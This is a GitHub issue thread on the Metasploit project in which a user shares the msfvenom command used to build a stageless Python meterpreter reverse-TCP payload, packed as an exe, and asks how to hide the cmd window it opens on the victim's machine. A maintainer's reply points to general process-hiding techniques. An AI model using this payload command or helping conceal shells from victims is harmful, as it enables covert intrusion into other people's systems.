### ISSUE TITLE
Python payload problem

### ISSUE THREAD

**Issue by CodexJ** [rapid7/metasploit-framework#15516]
Hello, i have an uncommon problem, I created a stageless python payload using " msfvenom -f raw -p python/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=4444" and converted to exe with pyinstaller, everything works fine and i get session but when i wanna get a cmd shell from victim, it will open a blank cmd in victim machine until i close it from attacker side ! whats the problem ? how can i hide that blank cmd in victim machine ?

Sorry for my English

**Comment by adfoster-r7** [comment]
Potentially a duplicate of https://github.com/rapid7/metasploit-framework/issues/9537

**Comment by jmartin-r7** [comment]
Reading this I think your question is about hiding the new running `cmd.exe` process spawned from your python meterpreter from the windows task manager. This is not currently a built in supported action in meterpreter.  

There are some post modules for persistence and other actions that may get closer to your goal, however I do not believe there are any that do exactly what you are asking for.

There are techniques for hiding processes and a quick internet search for `hide process from task manager` can point at some ideas.  Currently you would need to implement these techniques either as a post module or as custom modification to  the meterpreter payload you are using.

**Comment by CodexJ** [comment]
> 
> 
> Reading this I think your question is about hiding the new running `cmd.exe` process spawned from your python meterpreter from the windows task manager. This is not currently a built in supported action in meterpreter.
> 
> There are some post modules for persistence and other actions that may get closer to your goal, however I do not believe there are any that do exactly what you are asking for.
> 
> There are techniques for hiding processes and a quick internet search for `hide process from task manager` can point at some ideas. Currently you would need to implement these techniques either as a post module or as custom modification to the meterpreter payload you are using.

Yes exactly, it spwans a cmd.exe out of nowhere on attacker side's desktop when type shell to get cmd access, coud you explain more detailedly, Im beginner or put the fixed code here for me, Thanks
